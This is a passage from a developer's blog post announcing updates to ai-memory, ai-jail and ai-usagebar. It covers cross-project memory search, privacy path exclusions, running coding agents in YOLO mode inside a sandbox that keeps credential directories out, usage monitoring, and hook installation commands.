<h3>Global preferences and cross-project search<span class="hx:absolute hx:-mt-20" id="global-preferences-and-cross-project-search"></span>
    <a href="#global-preferences-and-cross-project-search" class="subheading-anchor" aria-label="Permalink for this section"></a></h3><p>Preferences that apply to all my work can now live in the reserved <code>_global</code> scope: coding style, preferred tools, personal rules, and conventions that don&rsquo;t belong to one specific repository. Normal queries already combine that scope with the current project.</p>
<p>For meta-repos that need to query several sibling projects all the time, there is another opt-in:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-toml" data-lang="toml"><span class="line"><span class="cl"><span class="p">[</span><span class="nx">recall</span><span class="p">]</span>
</span></span><span class="line"><span class="cl"><span class="nx">default_global</span> <span class="p">=</span> <span class="s2">&#34;true&#34;</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>With that, <code>memory_query</code> and <code>memory_recent</code> without an explicit scope search every project. I don&rsquo;t turn it on in every repo because gratuitous global search only adds noise.</p>
<h3>Less static instruction, more Agent Skills<span class="hx:absolute hx:-mt-20" id="less-static-instruction-more-agent-skills"></span>
    <a href="#less-static-instruction-more-agent-skills" class="subheading-anchor" aria-label="Permalink for this section"></a></h3><p>The routing block in <code>CLAUDE.md</code> or <code>AGENTS.md</code> got smaller. Detailed instructions for when to search memory, consolidate, save a decision, or create a handoff moved into managed Agent Skills. One command installs or updates both without trampling the rest of the file:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">ai-memory install-instructions</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>That reduces drift too. When the protocol changes, I update the managed package instead of hunting down an old prompt copied across forty repositories.</p>
<h3>Privacy before the network<span class="hx:absolute hx:-mt-20" id="privacy-before-the-network"></span>
    <a href="#privacy-before-the-network" class="subheading-anchor" aria-label="Permalink for this section"></a></h3><p>Each repo can now exclude paths from capture:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-toml" data-lang="toml"><span class="line"><span class="cl"><span class="p">[</span><span class="nx">capture</span><span class="p">]</span>
</span></span><span class="line"><span class="cl"><span class="nx">ignore_paths</span> <span class="p">=</span> <span class="p">[</span><span class="s2">&#34;private/**&#34;</span><span class="p">,</span> <span class="s2">&#34;~/personal-notes/**&#34;</span><span class="p">]</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>When an integration recognizes a file tool and the path matches, the event is discarded locally before spool, queue, network, or server. The limits are clear: this isn&rsquo;t magic DLP, it doesn&rsquo;t understand every shell command, and it doesn&rsquo;t track content quoted in free-form text. But it handles the verifiable case without selling a fake guarantee.</p>
<p>There are also new integrations with Kimi Code, Grok Build CLI, Devin, and Zero, an OpenCode Zen/Go provider, <code>finalize-session</code> for Codex, and workspace-administration improvements. Again: having MCP and a hook doesn&rsquo;t automatically mean having <code>ai-memory run</code>. The <a href="https://github.com/akitaonrails/ai-memory#support-matrix"target="_blank" rel="noopener">README</a> separates those levels.</p>
<h2>Bonus: ai-jail on the outside, YOLO on the inside<span class="hx:absolute hx:-mt-20" id="bonus-ai-jail-on-the-outside-yolo-on-the-inside"></span>
    <a href="#bonus-ai-jail-on-the-outside-yolo-on-the-inside" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Just over a week ago I wrote about <a href="/en/2026/07/11/how-to-protect-yourself-from-agents-deleting-your-stuff/">how I protect myself from agents deleting my stuff</a>. My recommendation remains the same: YOLO mode gives the best experience, provided the system limits the possible damage.</p>
<p><a href="https://github.com/akitaonrails/ai-jail"target="_blank" rel="noopener">ai-jail</a> reached version 1.15.0 and now understands the ai-memory launcher. My favorite way to work has become:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">ai-jail ai-memory run codex --yolo</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>Or, when I want ai-memory to choose which harness should continue:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">ai-jail ai-memory run --yolo</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>Order matters. <code>ai-jail</code> stays on the outside so the launcher and child process remain inside the same sandbox. <code>ai-memory run</code> by itself manages the session, but it doesn&rsquo;t create a sandbox.</p>
<p><code>--yolo</code> gets rid of the harness&rsquo;s approval ceremony. ai-jail handles containment: the current project is read-write, home is replaced with tmpfs, necessary parts of agent state are mounted selectively, and sensitive directories such as <code>.ssh</code>, <code>.gnupg</code>, and <code>.aws</code> stay outside the jail. The new support also keeps ai-memory&rsquo;s local state writable so hooks can maintain spools and cursors between runs.</p>
<p>ai-jail recognizes both the <code>ai-memory</code> layer and the selected harness. If you have Codex-specific global configuration, for example, it still applies when the actual command is <code>ai-memory run codex</code>. Even the status-bar redraw adjustment understands that the child is Codex.</p>
<p>This combination takes care of both annoyances at once: the agent stops asking for confirmation on every command, and the session stops belonging to the agent. You get the speed without handing over your entire home directory.</p>
<h2>One more thing: ai-usagebar grew too<span class="hx:absolute hx:-mt-20" id="one-more-thing-ai-usagebar-grew-too"></span>
    <a href="#one-more-thing-ai-usagebar-grew-too" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>When I published the <a href="/en/2026/05/24/i-built-a-waybar-widget-for-omarchy-to-monitor-llm-usage-ai-usagebar/">original ai-usagebar</a>, it monitored Claude, Codex, Z.AI, and OpenRouter in a Waybar widget or TUI. Version 0.14.0 already covers <strong>eleven usage, spending, or balance integrations</strong>.</p>
<p>Kimi got the two pieces of information that really matter for coding: weekly subscription quota and the rolling five-hour window. Kilo, Novita, Moonshot, and Grok show remaining balance. A separate Anthropic Console integration shows API spending for the month without conflating it with the Claude Code subscription. It makes clear that the Cost API doesn&rsquo;t include Priority Tier.</p>
<p>You can also register multiple Anthropic accounts, see weekly limits for specific models such as Fable, and get a pace marker. The bar doesn&rsquo;t turn red just because it reached 40%; it compares the percentage spent with how much of the window has passed. If I used 40% in 20% of the week, I&rsquo;m moving too fast. That&rsquo;s the useful information.</p>
<p>The project outgrew Waybar. It has a native macOS menu bar app, a GNOME extension, and a standalone TUI. The newest addition is a local Claude Code context monitor: I press <code>c</code>, choose one of the recent sessions, and see how much of the window it has consumed. It reads limited tails from local JSONL files and doesn&rsquo;t invent a percentage when it can&rsquo;t determine the window size.</p>
<p>In my workflow, the three end up working together. <code>ai-usagebar</code> shows which subscription still has room. <code>ai-memory run</code> switches harnesses without throwing away the work. <code>ai-jail</code> lets the chosen one run in YOLO without unrestricted access to the machine.</p>
<h2>Updating<span class="hx:absolute hx:-mt-20" id="updating"></span>
    <a href="#updating" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The installation pages for all three projects cover every method, including AUR, Homebrew, and release binaries:</p>
<ul>
<li><a href="https://github.com/akitaonrails/ai-memory"target="_blank" rel="noopener">ai-memory</a></li>
<li><a href="https://github.com/akitaonrails/ai-jail"target="_blank" rel="noopener">ai-jail</a></li>
<li><a href="https://github.com/akitaonrails/ai-usagebar"target="_blank" rel="noopener">ai-usagebar</a></li>
</ul>
<p>After updating ai-memory, reinstall the hooks for the harnesses you plan to use in managed mode. The three main ones in my case:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">ai-memory install-hooks --agent claude-code --apply
</span></span><span class="line"><span class="cl">ai-memory install-hooks --agent codex --apply
</span></span><span class="line"><span class="cl">ai-memory install-hooks --agent opencode --apply</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>Crush doesn&rsquo;t need a hook in managed mode; it receives context through a temporary file configured only for the launched process. The <a href="https://github.com/akitaonrails/ai-memory/blob/main/docs/managed-workstreams.md"target="_blank" rel="noopener">managed workstreams documentation</a> covers installation, privacy, recovery, and native arguments for each adapter.</p>
<h2>Conclusion<span class="hx:absolute hx:-mt-20" id="conclusion"></span>
    <a href="#conclusion" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>A month ago, ai-memory could already turn a session into a wiki and hand off to the next agent. Now it can manage the line of work itself: adopt an existing session, keep one native session per harness, carry visible history, resume each client in its own format, and keep the entire ledger searchable.</p>
<p>For me, that&rsquo;s the value. The code contains the implementation that won. The session contains the decisions, failed experiments, gotchas, unexpected bugs, and changes of mind that produced that implementation. Throwing all of it away every time you change providers is wasteful.</p>
<p>A raw transcript doesn&rsquo;t solve the problem by itself either. It&rsquo;s large, repetitive, and expensive to stuff into every context. ai-memory keeps the evidence, delivers only the recent delta, and uses consolidation to turn what deserves to survive into short Markdown pages.</p>
<p>There are still new formats to support, platform rough edges, and plenty of testing ahead. The difference is that there is now a real foundation, with an acceptance test that calls actual harnesses, 14 outside contributors with merged PRs in a little over a month, and daily use pushing the design forward.</p>
<p>I rent LLMs and subscriptions from whoever is delivering the best service today. My project&rsquo;s session stays with me.</p>
]]></content:encoded><category>ai-memory</category><category>coding-agents</category><category>ai-jail</category><category>ai-usagebar</category></item></channel></rss>